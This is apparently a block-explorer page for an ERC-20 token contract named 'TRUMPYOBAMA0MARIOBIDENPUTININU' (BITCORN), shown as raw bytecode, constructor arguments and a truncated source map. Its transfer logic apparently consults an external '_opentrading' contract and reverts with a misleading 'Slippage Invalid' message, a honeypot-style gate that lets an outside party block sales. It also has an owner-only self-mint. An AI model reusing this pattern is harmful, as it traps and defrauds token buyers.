5b411b1b723b7e6286a1c885a96bc99134cb19faa07a1d7d64736f6c63430008140033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e83e6ae19f499a7741119d037695be1346b642fa000000000000000000000000000000000000000000000000000000000000001e5452554d50594f42414d41304d4152494f424944454e505554494e494e5500000000000000000000000000000000000000000000000000000000000000000007424954434f524e00000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102b0578063bcfaa79d146102e0578063dd62ed3e146102fc578063f2fde38b1461032c576100fe565b8063715018a61461023a5780638da5cb5b1461024457806395d89b4114610262578063a457c2d714610280576100fe565b80632431ba73116100d15780632431ba731461019e578063313ce567146101bc57806339509351146101da57806370a082311461020a576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806323b872dd1461016e575b5f80fd5b61010a610348565b6040516101179190610f99565b60405180910390f35b61013a6004803603810190610135919061104a565b6103d8565b60405161014791906110a2565b60405180910390f35b6101586103fa565b60405161016591906110ca565b60405180910390f35b610188600480360381019061018391906110e3565b610403565b60405161019591906110a2565b60405180910390f35b6101a6610431565b6040516101b3919061118e565b60405180910390f35b6101c4610456565b6040516101d191906111c2565b60405180910390f35b6101f460048036038101906101ef919061104a565b61045e565b60405161020191906110a2565b60405180910390f35b610224600480360381019061021f91906111db565b610494565b60405161023191906110ca565b60405180910390f35b6102426104d9565b005b61024c6104ec565b6040516102599190611215565b60405180910390f35b61026a610514565b6040516102779190610f99565b60405180910390f35b61029a6004803603810190610295919061104a565b6105a4565b6040516102a791906110a2565b60405180910390f35b6102ca60048036038101906102c5919061104a565b610619565b6040516102d791906110a2565b60405180910390f35b6102fa60048036038101906102f591906111db565b61063b565b005b6103166004803603810190610311919061122e565b6106b8565b60405161032391906110ca565b60405180910390f35b610346600480360381019061034191906111db565b61073a565b005b60606004805461035790611299565b80601f016020809104026020016040519081016040528092919081815260200182805461038390611299565b80156103ce5780601f106103a5576101008083540402835291602001916103ce565b820191905f5260205f20905b8154815290600101906020018083116103b157829003601f168201915b5050505050905090565b5f806103e26107bc565b90506103ef8185856107c3565b600191505092915050565b5f600354905090565b5f8061040d6107bc565b905061041a858285610986565b610425858585610a11565b60019150509392505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f6012905090565b5f806104686107bc565b905061048981858561047a85896106b8565b61048491906112f6565b6107c3565b600191505092915050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104e1610dc4565b6104ea5f610e42565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461052390611299565b80601f016020809104026020016040519081016040528092919081815260200182805461054f90611299565b801561059a5780601f106105715761010080835404028352916020019161059a565b820191905f5260205f20905b81548152906001019060200180831161057d57829003601f168201915b5050505050905090565b5f806105ae6107bc565b90505f6105bb82866106b8565b905083811015610600576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f790611399565b60405180910390fd5b61060d82868684036107c3565b60019250505092915050565b5f806106236107bc565b9050610630818585610a11565b600191505092915050565b610643610dc4565b5f61064d33610494565b90506b87b595f2383509fe10000000811461069d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069490611401565b60405180910390fd5b6106b433836b87b595f2383509fe10000000610a11565b5050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610742610dc4565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a79061148f565b60405180910390fd5b6107b981610e42565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610831576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108289061151d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361089f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610896906115ab565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161097991906110ca565b60405180910390a3505050565b5f61099184846106b8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a0b57818110156109fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f490611613565b60405180910390fd5b610a0a84848484036107c3565b5b50505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16631c151582846040518263ffffffff1660e01b8152600401610a6b9190611215565b602060405180830381865afa158015610a86573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610aaa919061165b565b15610aea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae1906116d0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4f9061175e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbd906117ec565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2b906117ec565b60405180910390fd5b610c3f838383610f05565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610cc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb99061187a565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dab91906110ca565b60405180910390a3610dbe848484610f0a565b50505050565b610dcc6107bc565b73ffffffffffffffffffffffffffffffffffffffff16610dea6104ec565b73ffffffffffffffffffffffffffffffffffffffff1614610e40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e37906118e2565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f46578082015181840152602081019050610f2b565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f6b82610f0f565b610f758185610f19565b9350610f85818560208601610f29565b610f8e81610f51565b840191505092915050565b5f6020820190508181035f830152610fb18184610f61565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fe682610fbd565b9050919050565b610ff681610fdc565b8114611000575f80fd5b50565b5f8135905061101181610fed565b92915050565b5f819050919050565b61102981611017565b8114611033575f80fd5b50565b5f8135905061104481611020565b92915050565b5f80604083850312156110605761105f610fb9565b5b5f61106d85828601611003565b925050602061107e85828601611036565b9150509250929050565b5f8115159050919050565b61109c81611088565b82525050565b5f6020820190506110b55f830184611093565b92915050565b6110c481611017565b82525050565b5f6020820190506110dd5f8301846110bb565b92915050565b5f805f606084860312156110fa576110f9610fb9565b5b5f61110786828701611003565b935050602061111886828701611003565b925050604061112986828701611036565b9150509250925092565b5f819050919050565b5f61115661115161114c84610fbd565b611133565b610fbd565b9050919050565b5f6111678261113c565b9050919050565b5f6111788261115d565b9050919050565b6111888161116e565b82525050565b5f6020820190506111a15f83018461117f565b92915050565b5f60ff82169050919050565b6111bc816111a7565b82525050565b5f6020820190506111d55f8301846111b3565b92915050565b5f602082840312156111f0576111ef610fb9565b5b5f6111fd84828501611003565b91505092915050565b61120f81610fdc565b82525050565b5f6020820190506112285f830184611206565b92915050565b5f806040838503121561124457611243610fb9565b5b5f61125185828601611003565b925050602061126285828601611003565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112b057607f821691505b6020821081036112c3576112c261126c565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61130082611017565b915061130b83611017565b9250828201905080821115611323576113226112c9565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611383602583610f19565b915061138e82611329565b604082019050919050565b5f6020820190508181035f8301526113b081611377565b9050919050565b7f546f6b656e73206d696e746564000000000000000000000000000000000000005f82015250565b5f6113eb600d83610f19565b91506113f6826113b7565b602082019050919050565b5f6020820190508181035f830152611418816113df565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611479602683610f19565b91506114848261141f565b604082019050919050565b5f6020820190508181035f8301526114a68161146d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611507602483610f19565b9150611512826114ad565b604082019050919050565b5f6020820190508181035f830152611534816114fb565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611595602283610f19565b91506115a08261153b565b604082019050919050565b5f6020820190508181035f8301526115c281611589565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6115fd601d83610f19565b9150611608826115c9565b602082019050919050565b5f6020820190508181035f83015261162a816115f1565b9050919050565b61163a81611088565b8114611644575f80fd5b50565b5f8151905061165581611631565b92915050565b5f602082840312156116705761166f610fb9565b5b5f61167d84828501611647565b91505092915050565b7f536c69707061676520496e76616c6964000000000000000000000000000000005f82015250565b5f6116ba601083610f19565b91506116c582611686565b602082019050919050565b5f6020820190508181035f8301526116e7816116ae565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611748602583610f19565b9150611753826116ee565b604082019050919050565b5f6020820190508181035f8301526117758161173c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117d6602383610f19565b91506117e18261177c565b604082019050919050565b5f6020820190508181035f830152611803816117ca565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611864602683610f19565b915061186f8261180a565b604082019050919050565b5f6020820190508181035f83015261189181611858565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118cc602083610f19565b91506118d782611898565b602082019050919050565b5f6020820190508181035f8301526118f9816118c0565b905091905056fea26469706673582212205ac5bf493bedf3cb5b411b1b723b7e6286a1c885a96bc99134cb19faa07a1d7d64736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e83e6ae19f499a7741119d037695be1346b642fa000000000000000000000000000000000000000000000000000000000000001e5452554d50594f42414d41304d4152494f424944454e505554494e494e5500000000000000000000000000000000000000000000000000000000000000000007424954434f524e00000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : tokenname_ (string): TRUMPYOBAMA0MARIOBIDENPUTININU
Arg [1] : tokensymbol_ (string): BITCORN
Arg [2] : _opentrading (address): 0xe83E6Ae19F499a7741119D037695BE1346b642Fa

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000e83e6ae19f499a7741119d037695be1346b642fa
Arg [3] : 000000000000000000000000000000000000000000000000000000000000001e
Arg [4] : 5452554d50594f42414d41304d4152494f424944454e505554494e494e550000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 424954434f524e00000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12829:558:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6173:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7895:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6664:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8104:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5379:28;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6506:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8409:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6835:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1718:103;;;:::i;:::-;;1070:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6392:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8658:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7168:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13156:228;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7424:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1976:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6173:100;6227:13;6260:5;6253:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6173:100;:::o;7895:201::-;7978:4;7995:13;8011:12;:10;:12::i;:::-;7995:28;;8034:32;8043:5;8050:7;8059:6;8034:8;:32::i;:::-;8084:4;8077:11;;;7895:201;;;;:::o;6664:108::-;6725:7;6752:12;;6745:19;;6664:108;:::o;8104:295::-;8235:4;8252:15;8270:12;:10;:12::i;:::-;8252:30;;8293:38;8309:4;8315:7;8324:6;8293:15;:38::i;:::-;8342:27;8352:4;8358:2;8362:6;8342:9;:27::i;:::-;8387:4;8380:11;;;8104:295;;;;;:::o;5379:28::-;;;;;;;;;;;;;:::o;6506:93::-;6564:5;6589:2;6582:9;;6506:93;:::o;8409:238::-;8497:4;8514:13;8530:12;:10;:12::i;:::-;8514:28;;8553:64;8562:5;8569:7;8606:10;8578:25;8588:5;8595:7;8578:9;:25::i;:::-;:38;;;;:::i;:::-;8553:8;:64::i;:::-;8635:4;8628:11;;;8409:238;;;;:::o;6835:127::-;6909:7;6936:9;:18;6946:7;6936:18;;;;;;;;;;;;;;;;6929:25;;6835:127;;;:::o;1718:103::-;956:13;:11;:13::i;:::-;1783:30:::1;1810:1;1783:18;:30::i;:::-;1718:103::o:0;1070:87::-;1116:7;1143:6;;;;;;;;;;;1136:13;;1070:87;:::o;6392:104::-;6448:13;6481:7;6474:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6392:104;:::o;8658:436::-;8751:4;8768:13;8784:12;:10;:12::i;:::-;8768:28;;8807:24;8834:25;8844:5;8851:7;8834:9;:25::i;:::-;8807:52;;8898:15;8878:16;:35;;8870:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8991:60;9000:5;9007:7;9035:15;9016:16;:34;8991:8;:60::i;:::-;9082:4;9075:11;;;;8658:436;;;;:::o;7168:193::-;7247:4;7264:13;7280:12;:10;:12::i;:::-;7264:28;;7303;7313:5;7320:2;7324:6;7303:9;:28::i;:::-;7349:4;7342:11;;;7168:193;;;;:::o;13156:228::-;956:13;:11;:13::i;:::-;13227:14:::1;13244:21;13254:10;13244:9;:21::i;:::-;13227:38;;12906:20;13284:6;:17;13276:43;;;;;;;;;;;;:::i;:::-;;;;;;;;;13332;13342:10;13354:11;12906:20;13332:9;:43::i;:::-;13216:168;13156:228:::0;:::o;7424:151::-;7513:7;7540:11;:18;7552:5;7540:18;;;;;;;;;;;;;;;:27;7559:7;7540:27;;;;;;;;;;;;;;;;7533:34;;7424:151;;;;:::o;1976:201::-;956:13;:11;:13::i;:::-;2085:1:::1;2065:22;;:8;:22;;::::0;2057:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2141:28;2160:8;2141:18;:28::i;:::-;1976:201:::0;:::o;246:98::-;299:7;326:10;319:17;;246:98;:::o;11395:380::-;11548:1;11531:19;;:5;:19;;;11523:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11629:1;11610:21;;:7;:21;;;11602:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11713:6;11683:11;:18;11695:5;11683:18;;;;;;;;;;;;;;;:27;11702:7;11683:27;;;;;;;;;;;;;;;:36;;;;11751:7;11735:32;;11744:5;11735:32;;;11760:6;11735:32;;;;;;:::i;:::-;;;;;;;;11395:380;;;:::o;12066:453::-;12201:24;12228:25;12238:5;12245:7;12228:9;:25::i;:::-;12201:52;;12288:17;12268:16;:37;12264:248;;12350:6;12330:16;:26;;12322:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12434:51;12443:5;12450:7;12478:6;12459:16;:25;12434:8;:51::i;:::-;12264:248;12190:329;12066:453;;;:::o;9564:982::-;9696:13;;;;;;;;;;;:22;;;9719:4;9696:28;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;9695:29;9687:58;;;;;;;;;;;;:::i;:::-;;;;;;;;;9780:1;9764:18;;:4;:18;;;9756:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9857:1;9843:16;;:2;:16;;;9835:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9932:1;9918:16;;:2;:16;;;9910:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9985:38;10006:4;10012:2;10016:6;9985:20;:38::i;:::-;10036:19;10058:9;:15;10068:4;10058:15;;;;;;;;;;;;;;;;10036:37;;10107:6;10092:11;:21;;10084:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;10224:6;10210:11;:20;10192:9;:15;10202:4;10192:15;;;;;;;;;;;;;;;:38;;;;10427:6;10410:9;:13;10420:2;10410:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;10477:2;10462:26;;10471:4;10462:26;;;10481:6;10462:26;;;;;;:::i;:::-;;;;;;;;10501:37;10521:4;10527:2;10531:6;10501:19;:37::i;:::-;9676:870;9564:982;;;:::o;1235:132::-;1310:12;:10;:12::i;:::-;1299:23;;:7;:5;:7::i;:::-;:23;;;1291:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1235:132::o;2337:191::-;2411:16;2430:6;;;;;;;;;;;2411:25;;2456:8;2447:6;;:17;;;;;;;;;;;;;;;;;;2511:8;2480:40;;2501:8;2480:40;;;;;;;;;;;;2400:128;2337:191;:::o;12529:125::-;;;;:::o;12664:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:60::-;4451:3;4472:5;4465:12;;4423:60;;;:::o;4489:142::-;4539:9;4572:53;4590:34;4599:24;4617:5;4599:24;:::i;:::-;4590:34;:::i;:::-;4572:53;:::i;:::-;4559:66;;4489:142;;;:::o;4637:126::-;4687:9;4720:37;4751:5;4720:37;:::i;:::-;4707:50;;4637:126;;;:::o;4769:141::-;4834:9;4867:37;4898:5;4867:37;:::i;:::-;4854:50;;4769:141;;;:::o;4916:161::-;5018:52;5064:5;5018:52;:::i;:::-;5013:3;5006:65;4916:161;;:::o;5083:252::-;5191:4;5229:2;5218:9;5214:18;5206:26;;5242:86;5325:1;5314:9;5310:17;5301:6;5242:86;:::i;:::-;5083:252;;;;:::o;5341:86::-;5376:7;5416:4;5409:5;5405:16;5394:27;;5341:86;;;:::o;5433:112::-;5516:22;5532:5;5516:22;:::i;:::-;5511:3;5504:35;5433:112;;:::o;5551:214::-;5640:4;5678:2;5667:9;5663:18;5655:26;;5691:67;5755:1;5744:9;5740:17;5731:6;5691:67;:::i;:::-;5551:214;;;;:::o;5771:329::-;5830:6;5879:2;5867:9;5858:7;5854:23;5850:32;5847:119;;;5885:79;;:::i;:::-;5847:119;6005:1;6030:53;6075:7;6066:6;6055:9;6051:22;6030:53;:::i;:::-;6020:63;;5976:117;5771:329;;;;:::o;6106:118::-;6193:24;6211:5;6193:24;:::i;:::-;6188:3;6181:37;6106:118;;:::o;6230:222::-;6323:4;6361:2;6350:9;6346:18;6338:26;;6374:71;6442:1;6431:9;6427:17;6418:6;6374:71;:::i;:::-;6230:222;;;;:::o;6458:474::-;6526:6;6534;6583:2;6571:9;6562:7;6558:23;6554:32;6551:119;;;6589:79;;:::i;:::-;6551:119;6709:1;6734:53;6779:7;6770:6;6759:9;6755:22;6734:53;:::i;:::-;6724:63;;6680:117;6836:2;6862:53;6907:7;6898:6;6887:9;6883:22;6862:53;:::i;:::-;6852:63;;6807:118;6458:474;;;;;:::o;6938:180::-;6986:77;6983:1;6976:88;7083:4;7080:1;7073:15;7107:4;7104:1;7097:15;7124:320;7168:6;7205:1;7199:4;7195:12;7185:22;;7252:1;7246:4;7242:12;7273:18;7263:81;;7329:4;7321:6;7317:17;7307:27;;7263:81;7391:2;7383:6;7380:14;7360:18;7357:38;7354:84;;7410:18;;:::i;:::-;7354:84;7175:269;7124:320;;;:::o;7450:180::-;7498:77;7495:1;7488:88;7595:4;7592:1;7585:15;7619:4;7616:1;7609:15;7636:191;7676:3;7695:20;7713:1;7695:20;:::i;:::-;7690:25;;7729:20;7747:1;7729:20;:::i;:::-;7724:25;;7772:1;7769;7765:9;7758:16;;7793:3;7790:1;7787:10;7784:36;;;7800:18;;:::i;:::-;7784:36;7636:191;;;;:::o;7833:224::-;7973:34;7969:1;7961:6;7957:14;7950:58;8042:7;8037:2;8029:6;8025:15;8018:32;7833:224;:::o;8063:366::-;8205:3;8226:67;8290:2;8285:3;8226:67;:::i;:::-;8219:74;;8302:93;8391:3;8302:93;:::i;:::-;8420:2;8415:3;8411:12;8404:19;;8063:366;;;:::o;8435:419::-;8601:4;8639:2;8628:9;8624:18;8616:26;;8688:9;8682:4;8678:20;8674:1;8663:9;8659:17;8652:47;8716:131;8842:4;8716:131;:::i;:::-;8708:139;;8435:419;;;:::o;8860:163::-;9000:15;8996:1;8988:6;8984:14;8977:39;8860:163;:::o;9029:366::-;9171:3;9192:67;9256:2;9251:3;9192:67;:::i;:::-;9185:74;;9268:93;9357:3;9268:93;:::i;:::-;9386:2;9381:3;9377:12;9370:19;;9029:366;;;:::o;9401:419::-;9567:4;9605:2;9594:9;9590:18;9582:26;;9654:9;9648:4;9644:20;9640:1;9629:9;9625:17;9618:47;9682:131;9808:4;9682:131;:::i;:::-;9674:139;;9401:419;;;:::o;9826:225::-;9966:34;9962:1;9954:6;9950:14;9943:58;10035:8;10030:2;10022:6;10018:15;10011:33;9826:225;:::o;10057:366::-;10199:3;10220:67;10284:2;10279:3;10220:67;:::i;:::-;10213:74;;10296:93;10385:3;10296:93;:::i;:::-;10414:2;10409:3;10405:12;10398:19;;10057:366;;;:::o;10429:419::-;10595:4;10633:2;10622:9;10618:18;10610:26;;10682:9;10676:4;10672:20;10668:1;10657:9;10653:17;10646:47;10710:131;10836:4;10710:131;:::i;:::-;10702:139;;10429:419;;;:::o;10854:223::-;10994:34;10990:1;10982:6;10978:14;10971:58;11063:6;11058:2;11050:6;11046:15;11039:31;10854:223;:::o;11083:366::-;11225:3;11246:67;11310:2;11305:3;11246:67;:::i;:::-;11239:74;;11322:93;11411:3;11322:93;:::i;:::-;11440:2;11435:3;11431:12;11424:19;;11083:366;;;:::o;11455:419::-;11621:4;11659:2;11648:9;11644:18;11636:26;;11708:9;11702:4;11698:20;11694:1;11683:9;11679:17;11672:47;11736:131;11862:4;11736:131;:::i;:::-;11728:139;;11455:419;;;:::o;11880:221::-;12020:34;12016:1;12008:6;12004:14;11997:58;12089:4;12084:2;12076:6;12072:15;12065:29;11880:221;:::o;12107:366::-;12249:3;12270:67;12334:2;12329:3;12270:67;:::i;:::-;12263:74;;12346:93;12435:3;12346:93;:::i;:::-;12464:2;12459:3;12455:12;12448:19;;12107:366;;;:::o;12479:419::-;12645:4;12683:2;12672:9;12668:18;12660:26;;12732:9;12726:4;12722:20;12718:1;12707:9;12703:17;12696:47;12760:131;12886:4;12760:131;:::i;:::-;12752:139;;12479:419;;;:::o;12904:179::-;13044:31;13040:1;13032:6;13028:14;13021:55;12904:179;:::o;13089:366::-;13231:3;13252:67;13316:2;13311:3;13252:67;:::i;:::-;13245:74;;13328:93;13417:3;13328:93;:::i;:::-;13446:2;13441:3;13437:12;13430:19;;13089:366;;;:::o;13461:419::-;13627:4;13665:2;13654:9;13650:18;13642:26;;13714:9;13708:4;13704:20;13700:1;13689:9